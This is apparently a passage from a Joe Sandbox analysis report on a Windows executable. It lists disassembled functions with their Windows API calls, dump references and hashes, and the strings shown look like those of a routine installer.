                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                            • API String ID: 1646373207-834958232
                                                                                            • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                            • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                            • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                            • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                            APIs
                                                                                              • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2238633743-2683653824
                                                                                            • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                            • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                            • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                            • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                            • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                            • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                            • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                            • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                            APIs
                                                                                              • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                              • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                            • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountErrorFileLastMoveTick
                                                                                            • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                            • API String ID: 2406187244-2685451598
                                                                                            • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                            • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                            • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                            • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 00413D46
                                                                                            • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                              • Part of subcall function 00418EC0: 6F59C6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                              • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                            • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorDesktopWindow$Show
                                                                                            • String ID:
                                                                                            • API String ID: 2074268717-0
                                                                                            • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                            • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                            • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                            • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                            • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                            • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadString$FileMessageModuleName
                                                                                            • String ID:
                                                                                            • API String ID: 704749118-0
                                                                                            • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                            • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                            • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                            • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                              • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                              • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                            • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                            • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                            • String ID:
                                                                                            • API String ID: 855768636-0
                                                                                            • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                            • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                            • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                            • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                            APIs
                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: OffsetRect
                                                                                            • String ID:
                                                                                            • API String ID: 177026234-0
                                                                                            • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                            • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                            • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                            • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                            APIs
                                                                                            • GetCursorPos.USER32 ref: 00417260
                                                                                            • SetCursor.USER32(00000000), ref: 004172A3
                                                                                            • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                            • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1959210111-0
                                                                                            • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                            • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                            • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                            • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                            • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                            • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                            • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                            • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                            • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 4025006896-0
                                                                                            • Opcode ID: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
                                                                                            • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                            • Opcode Fuzzy Hash: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
                                                                                            • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                            APIs
                                                                                            • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                            • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                            • String ID:
                                                                                            • API String ID: 4071923889-0
                                                                                            • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                            • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                            • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                            • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                            • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                            • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                            • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 730355536-0
                                                                                            • Opcode ID: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                                                            • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                            • Opcode Fuzzy Hash: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                                                            • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                            Strings
                                                                                            • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                            • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                            • API String ID: 1452528299-3038984924
                                                                                            • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                            • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                            • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
